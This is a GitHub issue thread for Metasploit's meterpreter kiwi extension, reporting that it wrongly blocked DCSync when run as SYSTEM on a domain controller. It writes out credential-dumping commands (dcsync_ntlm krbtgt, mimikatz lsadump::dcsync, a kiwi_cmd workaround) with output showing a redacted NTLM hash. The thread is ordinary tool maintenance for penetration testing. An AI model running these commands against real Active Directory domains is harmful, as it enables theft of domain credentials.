### ISSUE TITLE
c/meterpreter kiwi blocks running DCSync as SYSTEM, including from DC's

### ISSUE THREAD

**Issue by jeffmcjunkin** [rapid7/metasploit-framework#14390]
## Steps to reproduce

How'd you do it?

1. Gain meterpreter on an existing DC in an Active Directory: Directory Services environment
2. Migrate to a process running as SYSTEM
3. Run `dcsync_ntlm krbtgt`

Output shown as follows:
![image](https://user-images.githubusercontent.com/1383363/99023918-71968780-251a-11eb-987f-fdc0d3eb150d.png)

While it's often the case the domain computer accounts can't DCSync, it's not universally true, and _especially_ not true in the case of domain controller's own computer accounts, which _can_ run DCSync, as shown using the standalone mimikatz.exe on a Server 2016 DC:
```
C:\>whoami
nt authority\system

C:\>set computername
COMPUTERNAME=DC01

C:\>ver

Microsoft Windows [Version 10.0.14393]

C:\>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /user:Administrator
[DC] 'redacted.local' will be the domain
[DC] 'DC01.redacted.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 5/16/2019 7:29:14 PM
Object Security ID   : S-1-5-21-721047592-4068106649-2889670365-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 64[redacted]9b
```

## Expected behavior

I'd expect the Mimikatz implementation inside of meterpreter to call the underlying C functions, without attempting to restrict the runtime improperly.

What should happen?

## Current behavior

Instead of running `lsadump::dcsync`, meterpreter refuses (rather rudely) to run if running as a computer account.

I might add that running `kiwi_cmd` allows a workaround:
```
meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'
[DC] 'redacted.local' will be the domain
[DC] 'DC01.redacted.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 5/16/2019 7:29:14 PM
Object Security ID   : S-1-5-21-721047592-4068106649-2889670365-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 64[redacted]9b
```

### Metasploit version

```
msf6 > dpkg -l metasploit-framework
[*] exec: dpkg -l metasploit-framework

Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                 Version         Architecture    Description
+++-====================-===============-===============-=============================================
ii  metasploit-framework 6.0.16+20201110 amd64           The full stack of metasploit-framework
```

**Comment by cnotin** [comment]
Message comes from: https://github.com/rapid7/metasploit-framework/blob/35017886b84655be521161c1e03c493b9121becb/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L541

Used in:
https://github.com/rapid7/metasploit-framework/blob/35017886b84655be521161c1e03c493b9121becb/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L173-L174
https://github.com/rapid7/metasploit-framework/blob/35017886b84655be521161c1e03c493b9121becb/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L185-L186
https://github.com/rapid7/metasploit-framework/blob/35017886b84655be521161c1e03c493b9121becb/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb#L304-L305

**Comment by OJ** [comment]
Aye true, perhaps we need some kind of "force" flag to make it happen? Or do you think no check should be present?

My feeling is to keep it there so that people know, and can optionally force it in that case.

**Comment by OJ** [comment]
> rather rudely

Did LOL :)

**Comment by jeffmcjunkin** [comment]
I'd rather keep the message, but as a warning. Something like:
```
Warning: Running as SYSTEM, DCSync rarely works from domain computer accounts.
```

But that's a bike shed I don't have to construct or paint :)

**Comment by smcintyre-r7** [comment]
This issue has been resolved by updating the message to a warning and allowing the operation to complete. The changes will be included in the upcoming 6.1.14 release.
